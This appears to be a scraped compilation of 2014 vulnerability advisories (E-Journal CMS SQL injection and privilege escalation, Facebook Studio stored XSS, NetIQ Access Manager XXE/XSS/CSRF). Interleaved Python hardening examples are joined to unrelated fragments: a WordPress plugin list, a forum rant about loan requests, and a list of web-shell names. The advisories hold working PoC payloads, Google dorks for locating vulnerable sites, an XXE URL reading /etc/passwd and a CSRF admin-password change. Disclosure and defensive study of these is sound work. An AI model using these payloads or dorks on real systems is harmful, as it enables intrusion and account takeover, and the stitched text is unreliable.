A sql injection web vulnerability has been discovered in the official E-Journal (ID) content management system. The vulnerability allows remote attackers to execute own sql commands by usage of a vulnerable service value.

The vulnerability is located in the id value of the jurnal.php file. Remote attackers are able to execute own sql commands by usage of a GET method request with manipulated id value. Remote attackers are able to read database information by execution of own sql commands. The vulnerability is located in the client-side and the request method to execute sql commands is GET.

The security risk of the sql vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0. Exploitation of the sql injection web vulnerability does not require a privileged application user account or user interaction. Successful exploitation of the remote vulnerability results in database management system and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] jurnal

Vulnerable File(s):
[+] jurnal.php

Vulnerable Parameter(s):
[+] id

1.2
A privilege escalation vulnerability has been discovered in the official E-Journal (ID) content management system. The vulnerability allows an attacker to escalate restricted privileges, for example to gain higher access controls.

The privilege escalation vulnerability is located in the tambah value of the URL input in the data.php file. Remote attackers can switch the menu to escalate privileges by adding a new administrator account. The vulnerability is located on the application-side and the request method to inject is POST.

The security risk of the privilege escalation vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the privilege escalation web vulnerability requires a low privileged application user account and no user interaction. Successful exploitation of the remote vulnerability results in information leaking, database management system- and web-application -compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] URL

Vulnerable File(s):
[+] data.php

Vulnerable Parameter(s):
[+] tambah

Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers without privileged application user account and user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Dork(s):
inurl:mahasiswa.php intitle:E-Journal
inurl:dosen.php intitle:E-Journal
inurl:jurnal.php intitle:E-Journal
inurl:dokumen.php intitle:E-Journal
"Karya Tulis Mahasiswa" intitle:E-Journal
"Design & Programming by" intitle:E-Journal
"E-Journal adalah aplikasi berbasis web untuk"
Or use your own Google Dorks

Note: This E-Journal CMS has 2 versions. The old version doesn't have informasi.php (Informasi Menu).

1.1 POC#1: SQL Injection
http://[Site]/[Path]/jurnal.php?detail=jurnal&id=-'[SQL-INJECTION VULNERABILITY]--

Reference Url(s):
http://e-journal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]--
http://www.ejournal-xxx.com/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]--
http://e-journal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]--
http://ejurnal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]--
http://ejournal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]--

1.2 PoC#2: Privilege Escalation
You can create a new administrator account by usage of the following trick.
For example, my target url is: http://www.ejournal-xxx.com/

Step 1: Add data.php?tambah=dosen in the URL. So in this case the URL was http://www.ejournal-xxx.com/data.php?tambah=dosen
Step 2: Then you can see this notice: "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR". Ignore that notice and click Admin Menu.
Screenshot #1: http://i59.tinypic.com/54he2b.png
Step 3: Successfully exploited! Now you can add an Administrator Account.
Screenshot #2: http://i59.tinypic.com/2i8vyus.png

Solution - Fix & Patch:
=======================
1.1
The vulnerability can be patched by usage of a prepared statement. Encode and parse the vulnerable id value in the jurnal.php file to prevent sql injection attacks.

1.2
Restrict the URL parameter input to prevent unauthorized account adds. Parse the URL value, encode the input and restrict the URL to a local source.

Security Risk:
==============
1.1
The security risk of the remote sql injection web vulnerability in the e-journal application is estimated as high. (CVSS 7.0)

1.2
The security risk of the privilege escalation web vulnerability in the URL parameter is estimated as high. (CVSS 6.9)

Credits & Authors:
==================
X-Cisadane - Stefanus (steevee.aka@gmail.com)
Greetz to: X-Code YogyaFree, Explore Crew, CodeNesia, Bogor Hackers Community, Tomi Zaoldyeck and Winda Utari

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Source
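Added example, not E-Journal's code: a small Python model of the two bugs in the advisory (the jurnal.php `id` value spliced into SQL, and a data.php access check that only prints a notice) beside the hardened forms the "Solution" section calls for. The table, column names and session layout are assumptions; the advisory does not show the CMS source.

```python
import sqlite3

# Constructed sample rows standing in for the CMS "jurnal" table
# (schema is an assumption; the advisory does not show it).
_ROWS = [
    (133, "Analisis Sistem Informasi", "published"),
    (134, "Draft internal", "draft"),
    (135, "Jaringan Komputer", "published"),
]

def _connect():
    """In-memory SQLite database seeded with the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE jurnal (id INTEGER, judul TEXT, status TEXT)")
    con.executemany("INSERT INTO jurnal VALUES (?, ?, ?)", _ROWS)
    return con

def get_jurnal_vulnerable(raw_id):
    """Flawed pattern (1.1): the GET 'id' value is pasted into the SQL text,
    so a quote in the value changes the query instead of staying data."""
    con = _connect()
    sql = "SELECT id, judul FROM jurnal WHERE id='%s'" % raw_id
    return con.execute(sql).fetchall()

def get_jurnal_safe(raw_id):
    """Hardened pattern (the advisory's fix): validate the id as an integer,
    then bind it as a prepared-statement parameter; the value can never
    alter the query structure."""
    try:
        jurnal_id = int(raw_id)
    except (TypeError, ValueError):
        return []  # reject non-numeric ids instead of building SQL from them
    con = _connect()
    return con.execute(
        "SELECT id, judul FROM jurnal WHERE id=?", (jurnal_id,)
    ).fetchall()

NOTICE = ("ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. "
          "SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR")

def handle_data_vulnerable(params, session):
    """Flawed pattern (1.2), modelled on the PoC: a non-admin gets the
    notice, but the handler keeps running and still renders the admin
    menu, so 'ignore the notice and click Admin Menu' works."""
    body = []
    if session.get("role") != "admin":
        body.append("NOTICE: " + NOTICE)
        # no return here: execution falls through to the privileged part
    if params.get("tambah") == "dosen":
        body.append("FORM: add dosen / administrator account")
    return 200, body

def handle_data_hardened(params, session):
    """Hardened pattern: authorize first and stop on failure, so the
    privileged form is never built for a non-admin session."""
    if session.get("role") != "admin":
        return 403, ["Forbidden: administrator login required"]
    body = []
    if params.get("tambah") == "dosen":
        body.append("FORM: add dosen / administrator account")
    return 200, body

if __name__ == "__main__":
    payload = "' OR '1'='1"
    print("vulnerable:", get_jurnal_vulnerable(payload))  # every row, draft included
    print("safe:      ", get_jurnal_safe(payload))        # []
    print(handle_data_vulnerable({"tambah": "dosen"}, {"role": "guest"}))
    print(handle_data_hardened({"tambah": "dosen"}, {"role": "guest"}))
```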
-
WordPress iTwitter 0.04 Cross Site Request Forgery / Cross Site Scripting
WordPress PictoBrowser 0.3.1 CSRF / XSS
WordPress Twitter 0.7 CSRF / XSS
WordPress PWG Random 1.11 CSRF / XSS
WordPress gSlideShow 0.1 CSRF / XSS
WordPress SimpleFlickr 3.0.3 CSRF / XSS
WordPress twimp-wp Cross Site Request Forgery / Cross Site Scripting
WordPress Simplelife 1.2 CSRF / XSS
WordPress Twitter LiveBlog 1.1.2 CSRF / XSS
WordPress TweetScribe 1.1 CSRF / XSS
WordPress WP Limit Posts Automatically 0.7 CSRF / XSS
WordPress WP Unique Article Header Image 1.0 CSRF / XSS
-
Document Title:
===============
Facebook Bug Bounty #16 (Studio) - Persistent Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1368

Facebook Security ID: 219162244

Release Date:
=============
2014-12-10

Vulnerability Laboratory ID (VL-ID):
====================================
1368

Common Vulnerability Scoring System:
====================================
3.5

Product & Service Introduction:
===============================
Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website's membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site.

Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as 'People From Work' or 'Close Friends'. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site's terms of service.

In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade 'best-of' list, saying, 'How on earth did we stalk our exes, remember our co-workers' birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?' Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position of 462 on the list published in 2013.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook )

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Researcher discovered a persistent input validation web vulnerability in the official Facebook Studio web-application.

Vulnerability Disclosure Timeline:
==================================
2014-12-10: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Facebook
Product: Studio Service - Web Application 2014 Q4

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Facebook Studio online-service web-application. The vulnerability allows remote attackers to inject malicious script codes on the application-side to compromise the online-service application.

The vulnerability is located in the dashboard module of the facebook studio service. Remote attackers are able to inject own script codes to the mobile client of facebook. After the inject of the payload the attacker can visit the dashboard service to execute the script codes. The vulnerability was disclosed during a pentest of the htmlentities on fb mobile client to the facebook studio service. The attack vector of the issue is persistent and the request method to inject is POST.

The security risk of the persistent vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the persistent security vulnerability requires a low privileged web-application user account and medium user interaction. Successful exploitation of the vulnerability results in persistent phishing attacks, persistent session hijacking attacks, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s): Input
[+] https://m.facebook.com/editprofile.php?type=contact&edit=website&refid=17

Affected Module(s): Output
[+] https://www.facebook-studio.com/dashboard#_=_

Proof of Concept (PoC):
=======================
Exploiting this bug is a first order injection in facebook mobile (m.facebook.com for firefox) that will result in XSS in the studio.

Manual steps to reproduce the vulnerability ...
1. Open the following fb mobile webpage https://m.facebook.com/editprofile.php?type=contact&edit=website&refid=17
Note: (using Firefox)
2. Then remove all the URLs you have (if you have any)
3. Add for example "https://somethinag.com/"onmouseover="alert(31337);*." (without the quotes)
4. After that surf to https://www.facebook-studio.com/dashboard#_=_ and you will have your stored XSS.
Note: Facebook didn't use htmlentity on the url when processing it to add it to the database. Whenever it is rendered, it won't be a second-order injection.
5. Successfully reproduced the vulnerability!

The full payload you need to add to your website is ...

PoC: https://url-source.com/"style="font-size:900px;"onmouseover="alert(31337);*.

Note: The full payload you need to add to your website is listed above.

Solution - Fix & Patch:
=======================
The issue has already been patched by the facebook developer team during participation in the official bug bounty program.

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the facebook studio website is estimated as medium. (CVSS 3.5)

Credits & Authors:
==================
Paulos Yibelo

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Source
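Added example, not Facebook's code: the advisory's point is that a profile "website" value was stored without entity encoding and later placed inside an HTML attribute. The Python below shows the rendering flaw beside two independent defenses, an input-side URL check and attribute-context output encoding, using the advisory's own payloads as constructed test input.

```python
import html
from urllib.parse import urlsplit

# The two payloads quoted in the advisory, used here only as test input.
ADVISORY_PAYLOADS = [
    'https://somethinag.com/"onmouseover="alert(31337);*.',
    'https://url-source.com/"style="font-size:900px;"onmouseover="alert(31337);*.',
]

def validate_website_url(value):
    """Input-side check for a 'website' field: accept only an absolute
    http(s) URL with a host and none of the characters that can end an HTML
    attribute or tag. Returns the value, or None when it must be rejected."""
    if not isinstance(value, str) or len(value) > 2048:
        return None
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    if any(ch in value for ch in '"\'<>` \t\r\n'):
        return None
    return value

def render_website_link_vulnerable(stored):
    """The rendering flaw the advisory describes: the stored value goes into
    an href attribute unencoded, so a '"' closes the attribute and the rest
    of the value becomes new attributes such as onmouseover=..."""
    return '<a href="%s">%s</a>' % (stored, stored)

def render_website_link(stored):
    """Output-side fix: encode for the attribute context at render time.
    quote=True turns '"' into &quot;, so it can no longer end the attribute,
    whatever was stored earlier (first-order or not)."""
    safe = html.escape(stored, quote=True)
    return '<a href="%s">%s</a>' % (safe, safe)

if __name__ == "__main__":
    for p in ADVISORY_PAYLOADS:
        print("accepted on input:", validate_website_url(p))  # None
        print("vulnerable:", render_website_link_vulnerable(p))
        print("hardened:  ", render_website_link(p))
```

Both checks are needed: the input check keeps junk out of the database, and the output encoding protects every page that renders values stored before the check existed.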
-
SEC Consult Vulnerability Lab Security Advisory < 20141218-2 >
=======================================================================
title: Multiple high risk vulnerabilities
product: NetIQ Access Manager
vulnerable version: 4.0 SP1
fixed version: 4.0 SP1 Hot Fix 3
CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216, CVE-2014-5217
impact: High
homepage: https://www.netiq.com/
found: 2014-10-29
by: W. Ettlinger
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
"As demands for secure web access expand and delivery becomes increasingly complex, organizations face some formidable challenges. Access Manager provides a simple yet secure and scalable solution that can handle all your web access needs—both internal as well as in the cloud."

URL: https://www.netiq.com/products/access-manager/

Business recommendation:
------------------------
An attacker without an account on the NetIQ Access Manager is able to gain administrative access by combining different attack vectors. Though this host may not always be accessible from a public network, an attacker is still able to compromise the system when directly targeting administrative users. Because the NetIQ Access Manager is used for authentication, an attacker compromising the system can use it to gain access to other systems.

SEC Consult highly recommends that this software is not used until a full security review has been performed and all issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1) XML eXternal Entity Injection (XXE, CVE-2014-5214)
Authenticated administrative users can download arbitrary files from the Access Manager administration interface as the user "novlwww".
The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015993

2) Reflected Cross Site Scripting (XSS, CVE-2014-5216)
Multiple reflected cross site scripting vulnerabilities were found. These allow effective attacks on administrative and SSLVPN sessions.
The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015994

3) Persistent Cross Site Scripting (XSS, CVE-2014-5216)
A persistent cross site scripting vulnerability was found. This allows effective attacks on administrative and SSLVPN sessions.
The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015996

4) Cross Site Request Forgery (CVE-2014-5217)
The Access Manager administration interface does not have CSRF protection.
The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015997

5) Information Disclosure (CVE-2014-5215)
Authenticated users of the administration interface can gain authentication information of internal administrative users.
The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015995

By combining all of the above vulnerabilities (CSRF, XSS, XXE) an unauthenticated, non-admin user may gain full access to the system!

Proof of concept:
-----------------
1) XML eXternal Entity Injection (XXE)
As an example, the following URL demonstrates the retrieval of the /etc/passwd file as an authenticated administrative user:
https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query>

2) Reflected Cross Site Scripting (XSS)
The following URLs demonstrate different reflected XSS flaws in the administration interface and the user interface.
https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'
https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E
https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

3) Persistent Cross Site Scripting (XSS)
The following URL injects a stored script on the auditing page:
https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+){if('&port=1289

4) Cross Site Request Forgery
As an example, an attacker is able to change the administration password to '12345' by issuing a GET request in the context of an authenticated administrator. The old password is not necessary for this attack!
https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345

5) Information Disclosure
The following URLs disclose useful information to an authenticated account:
https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp
https://<host>:8443/roma/jsp/debug/debug.jsp

The disclosed system properties:
com.volera.vcdn.monitor.password
com.volera.vcdn.alert.password
com.volera.vcdn.sync.password
com.volera.vcdn.scheduler.password
com.volera.vcdn.publisher.password
com.volera.vcdn.application.sc.scheduler.password
com.volera.vcdn.health.password

The static string "k~jd)*L2;93=Gjs" is XORed with these values in order to decrypt passwords of internally used service accounts.

By combining all of the above vulnerabilities (CSRF, XSS, XXE) an unauthenticated, non-admin user may gain full access to the system!

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the NetIQ Access Manager version 4.0 SP1, which was the most recent version at the time of discovery.

Vendor contact timeline:
------------------------
2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys
2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page
2014-10-30: Sending encrypted security advisory to Novell
2014-10-30: Novell acknowledges the receipt of the advisory
2014-12-16: Novell: the vulnerability fixes will be released tomorrow; The CSRF vulnerability will not be fixed immediately ("Since this can be done only after an authorized login"); two XSS vulnerabilities can not be exploited ("We could not take advantage or retrieve any cookie info on the server side - it looks like it's a client side cross scripting attack.")
2014-12-16: Explaining why those vulnerabilities can be exploited
2014-12-17: Novell: Fix will be released tomorrow
2014-12-17: Verifying release of advisory tomorrow
2014-12-18: Novell: Advisory can be released
2014-12-18: Coordinated release of security advisory

Solution:
---------
Update to the latest available version of Access Manager and implement the workarounds mentioned in the KB articles by Novell linked above.

Workaround:
-----------
For some vulnerabilities, Novell provides best practice recommendations in the URLs linked above.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult? Write to career@sec-consult.com

EOF W. Ettlinger / @2014

Source
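Added example, not NetIQ's code: a request-side check for the XXE vector in the advisory, written in Python so it can be run against the advisory's own PoC URL. The `query` parameter of the fw.PreviewObjectFilter request is decoded, rejected if it carries any DOCTYPE or entity declaration, and only then parsed. `host.example` stands in for the advisory's `<host>` placeholder; the benign request is constructed.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# The advisory's PoC URL with 'host.example' in place of <host>.
POC_URL = (
    "https://host.example:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter"
    "&nextState=initialState&merge=fw.TCPreviewFilter"
    "&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+\"/etc/passwd\">%0a]>"
    "<query><container>%26include%3b</container><subclasses>false</subclasses></query>"
)
# Constructed benign request of the same shape (no DTD, plain element content).
BENIGN_URL = (
    "https://host.example:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter"
    "&query=<query><container>ou%3Dusers</container><subclasses>false</subclasses></query>"
)

# A DOCTYPE or ENTITY declaration, or a parameter-entity reference, is rejected
# outright: the query format never needs a DTD, so there is nothing to allow.
DTD_MARKERS = re.compile(r"<!(?:DOCTYPE|ENTITY)\b|%[A-Za-z_][\w.-]*;", re.IGNORECASE)

class UnsafeXML(ValueError):
    """Raised when a query carries a DTD and must not reach the XML parser."""

def query_param(url):
    """Return the URL-decoded 'query' parameter of a webacc URL ('' if absent).
    parse_qs maps '+' to space and %26include%3b back to '&include;'."""
    return parse_qs(urlsplit(url).query).get("query", [""])[0]

def parse_query_xml(text):
    """Parse a PreviewObjectFilter query only after confirming it has no DTD;
    without a DTD the document cannot declare an external entity at all."""
    if DTD_MARKERS.search(text):
        raise UnsafeXML("DTD or entity declaration in query parameter")
    return ET.fromstring(text)

def check_request(url):
    """Classify a request as ('blocked', reason) or ('allowed', {tag: text})."""
    text = query_param(url)
    try:
        root = parse_query_xml(text)
    except UnsafeXML as exc:
        return "blocked", str(exc)
    except ET.ParseError as exc:
        return "blocked", "malformed XML: %s" % exc
    return "allowed", {child.tag: (child.text or "") for child in root}

if __name__ == "__main__":
    print(check_request(POC_URL))     # ('blocked', 'DTD or entity declaration in query parameter')
    print(check_request(BENIGN_URL))  # ('allowed', {'container': 'ou=users', 'subclasses': 'false'})
```

The same rejection belongs in the server-side parser configuration (disallow DOCTYPE, disable external entities); the request-level check is a detection layer that also gives you a log line for each attempt.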
-
Yeah, are many more of you going to come begging? Off:// Any idea how I can get hold of 1 million dollars? I only need 1 million more and I'll be a millionaire!
https://rstforums.com/forum/94024-ajutor-imprumut.rst
https://rstforums.com/forum/60486-imprumut.rst
https://rstforums.com/forum/75076-3-centi-paypal.rst
https://rstforums.com/forum/62373-imprumut-3-euro.rst
https://rstforums.com/forum/85639-imprumut-paypal.rst
https://rstforums.com/forum/71639-5-e-paypal.rst
https://rstforums.com/forum/86029-imprumut-3-paypal-pana-maine.rst
https://rstforums.com/forum/88712-care-s-mi-dea-n-mprumut-1-a.rst
https://rstforums.com/forum/88965-cerere.rst
https://rstforums.com/forum/88936-cerere-paypal.rst
https://rstforums.com/forum/91739-imprumut-cu-1-0-73-e-paypal.rst
https://rstforums.com/forum/92423-imprumut-2-paypal.rst
https://rstforums.com/forum/93231-salut-rst.rst
https://rstforums.com/forum/93989-am-nevoie-de-ajutor.rst
-
CCCPShell Acid Shell v2 b374k 2.2 Shell